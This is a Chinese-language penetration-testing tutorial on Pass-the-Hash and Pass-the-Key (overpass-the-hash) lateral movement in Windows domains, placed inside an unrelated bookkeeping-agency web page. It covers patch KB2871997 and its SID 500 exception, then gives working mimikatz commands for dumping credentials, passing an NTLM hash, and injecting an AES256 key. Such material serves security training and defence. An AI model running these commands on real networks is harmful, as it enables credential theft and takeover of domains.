您好,欢迎访问代理记账网站
移动应用 微信公众号 联系我们

咨询热线 -

电话 15988168888

联系客服
  • 价格透明
  • 信息保密
  • 进度掌控
  • 售后无忧

看我横向打你内网--PthPtk

Pass the Hash&&Pass The Key

微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997

在域环境中,利用pass the hash的渗透方式往往是这样的:

  1. 获得一台域主机的权限
  2. Dump内存获得用户hash
  3. 通过pass the hash尝试登录其他主机
  4. 继续搜集hash并尝试远程登录
  5. 直到获得域管理员账户hash,登录域控,最终成功控制整个域

下面简要介绍一下Pass The Hash技术发展的几段历史

1、2012年12月

微软发布了针对Pass The Hash攻击的防御指导,链接如下:
[http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques_English.pdf)

如图这里写图片描述这里写图片描述

2、2014年5月13日

微软终于发布了更新补丁kb2871997,禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。

然而,Craig在测试中发现,在打了补丁之后,常规的Pass The Hash已经无法成功,唯独默认的 Administrator (SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程连接。

并且值得注意的是即使administrator改名,它的SID仍然是500,这种攻击方法依然有效。所以对于防御来说,即使打了补丁也要记得禁用SID=500的管理员账户。

相关链接如下:
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

3、如今

大家对Pass The Hash的认识越来越高,防御方法越来越多,比如上一篇提到的LAPS解决了域内主机本地管理员密码相同的问题。

同样,禁用NTLM使得psexec无法利用获得的ntlm hash进行远程连接。

4、mimikatz出现

它的出现再次改变了格局。mimikatz实现了在禁用NTLM的环境下仍然可以远程连接。

下面就实际测试一下其中的细节

Pass the Hash

抓取密码,本地管理员或者域管理员

privilege::debug
sekurlsa::logonpasswords
privilege::debug sekurlsa::logonpasswords >> C:/log.txt  获取hash
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:abc.com /ntlm:afffeba176210fad4628f0524bfe1942 /run:c:\windows\system32\cmd.exe"

在这里插入图片描述

Pass The Key (OverPass-the-Hash)

当系统安装了KB2871997补丁且禁用了NTLM的时候,那我们抓取到的ntlm hash

也就失去了作用,但是可以通过pass the key的攻击方式获得权限

mimikatz "privilege::debug" "sekurlsa::ekeys" 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:dc /domain:abc.com /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" 注入aes key

根据提示,尝试在系统安装补丁kb2871997后继续测试
安裝 : https://www.microsoft.com/en-us/download/details.aspx?id=42765
之后可以用\计算机名的方式通过远程共享查看目标机器(ps:这里必须要使用计算机名进行连接,会爆密码错误。 不要用win10测试,win10机器测试会在一分鐘后重啓 ,)
(如果获取的散列是NTLM,则Kerberos凭证加密方法是RC4。如果散列加密方法为AES,则Kerberos票使用AES进行的加密。)


分享:

低价透明

统一报价,无隐形消费

金牌服务

一对一专属顾问7*24小时金牌服务

信息保密

个人信息安全有保障

售后无忧

服务出问题客服经理全程跟进